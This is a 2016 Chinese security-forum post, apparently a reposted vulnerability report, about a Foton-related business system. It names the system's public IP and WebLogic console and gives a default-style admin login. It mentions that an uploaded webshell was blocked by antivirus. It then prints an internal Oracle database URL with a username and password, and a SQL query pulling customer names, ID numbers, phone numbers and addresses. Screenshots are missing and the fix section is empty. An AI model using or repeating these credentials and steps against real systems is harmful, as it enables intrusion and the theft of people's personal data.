HanDs
管理员

[7月漏洞公开] 弱口令系列二之福田某系统漏洞可导致大量数据泄漏 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

大量数据泄漏

详细说明:

http://61.233.8.174:7002 福田

http://61.233.8.174:7002/console/ 弱口令 weblogic/weblogic123

XWPF~[]OAFS~Y51F[$IZ9FN.png





有杀软,马被杀,只能另辟途径



数据库

<value>jdbc:oracle:thin:@172.24.3.31:1521:cmmsdb1</value>



<property name="userName"><value>omkhxx</value></property>



<property name="password"><value>newkhxx2013</value></property>

直接连裤

select CUSTOMER_NAME,ID_NUMBER,MOBILE,ADDR_ADDRESS FROM OMXX_TM_CUSTOMER WHERE ROWNUM<=20



`ZHA7@4@7J3U82KPJZLYLX4.png



@(U17X`%5ZY5(Y$FIIVT6)2.png

_7WCEZ3T3T5W89Y{`HM_0F7.png

BZ1S60YKGW%JPQR}_7(V9HA.png

漏洞证明:

V_R$RV$ZGR`GZ(5B)HISU]H.png

_7WCEZ3T3T5W89Y{`HM_0F7.png

@(U17X`%5ZY5(Y$FIIVT6)2.png

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
口令 系列 福田 系统 漏洞 导致 大量 数据 泄漏
#1楼
发帖时间:2016-7-19   |   查看数:0   |   回复数:0
游客组
快速回复